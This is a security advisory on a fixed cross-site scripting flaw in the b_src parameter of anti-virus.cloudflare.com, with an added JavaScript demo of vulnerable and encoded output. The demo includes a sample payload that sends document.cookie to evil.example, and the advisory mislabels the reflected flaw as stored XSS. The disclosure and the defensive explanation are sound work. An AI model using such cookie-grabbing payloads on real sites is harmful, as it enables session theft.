0x1 Site : http://anti-virus.cloudflare.com
0x3 Author : Sandeep Kamble
0x4 Reported : October 12, 2011
0x6 Public Release : October 17, 2011
0x7 Status : Fixed
Description :
Anti-virus.cloudflare.com is a CloudFlare service for blocking spam and other abusive traffic. Its purpose is to stop attacks and to educate visitors whose computers are infected about how they can clean up their machines.
Affected Variable :
?b_src= (query-string parameter)
Exploit :
JavaScript can be executed through the vulnerable query-string parameter b_src. This class of attack is commonly known as Cross-Site Scripting (XSS).
The affected script on anti-virus.cloudflare.com writes the value of b_src into its HTML output without encoding it, so an attacker-supplied payload runs in the context of that origin. The resulting stored XSS can be used, for example, to grab visitors' cookies.
POC :
Screen Shot : (image: Cloud XSS)
Fix :
1) Determine whether the HTML output includes any of the request's input parameters (here, b_src) without encoding.
2) In short, perform input sanitization, and HTML-encode every user-supplied value at the point where it is written into the response.
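The following is an added example, not code from the advisory or from CloudFlare. It shows a minimal page that reflects the b_src query parameter (the parameter the advisory names) once in the vulnerable form and once hardened with output encoding, and implements the check from step 1: feed the page a canary of HTML metacharacters and see whether it comes back unencoded. The HTML template, the function names and the sample payload are constructed for illustration and are not taken from the real anti-virus.cloudflare.com page.

```javascript
// Added example, not code from the advisory or from CloudFlare: a minimal page
// that reflects the b_src query parameter (the parameter the advisory names),
// shown once vulnerable and once hardened, plus the check from step 1 above.
// The HTML template, function names and the sample payload are constructed
// for illustration; they are not taken from the real anti-virus.cloudflare.com page.

// Pull the b_src value out of a request URL, as the affected script would.
function bSrcFromUrl(url) {
  return new URL(url).searchParams.get('b_src');
}

// HTML-encode the five characters that break out of text and attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the raw parameter value is concatenated straight into the HTML,
// so a value containing <script> becomes live markup in the response.
function renderVulnerable(bSrc) {
  return `<html><body><p>Request blocked. Source: ${bSrc}</p></body></html>`;
}

// Hardened: same template, but the value is encoded at the point of output,
// so the browser shows the payload as text instead of executing it.
function renderHardened(bSrc) {
  return `<html><body><p>Request blocked. Source: ${escapeHtml(bSrc)}</p></body></html>`;
}

// Step 1 of the fix: does the HTML output include the input parameter unencoded?
// Feed the renderer a canary made of HTML metacharacters and look for it verbatim.
function reflectsUnencoded(render) {
  const canary = 'zz<"\'>zz';
  return render(canary).includes(canary);
}

// Constructed sample payload of the cookie-grabbing kind the advisory mentions.
// evil.example is a reserved example domain, not a real host.
const SAMPLE_PAYLOAD =
  "<script>location='//evil.example/?c='+document.cookie</script>";

function demo() {
  const url = 'http://anti-virus.cloudflare.com/?b_src=' + encodeURIComponent(SAMPLE_PAYLOAD);
  const bSrc = bSrcFromUrl(url);
  return {
    vulnerableReflects: reflectsUnencoded(renderVulnerable), // true
    hardenedReflects: reflectsUnencoded(renderHardened),     // false
    vulnerableHtml: renderVulnerable(bSrc),
    hardenedHtml: renderHardened(bSrc),
  };
}

console.log(demo());
```

The canary check is the practical form of step 1: rather than reading the template, send a value that can only survive verbatim if no encoding happened. Note that encoding belongs at the output point, because a value that is safe in one context (HTML text) is not automatically safe in another (an attribute or a script block).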
Conclusion :
I would like to thank the CloudFlare Security Team for their quick responses to my reports.
nice work man !!!
This is my first time visiting here and I am really impressed to
read all of it in a single place.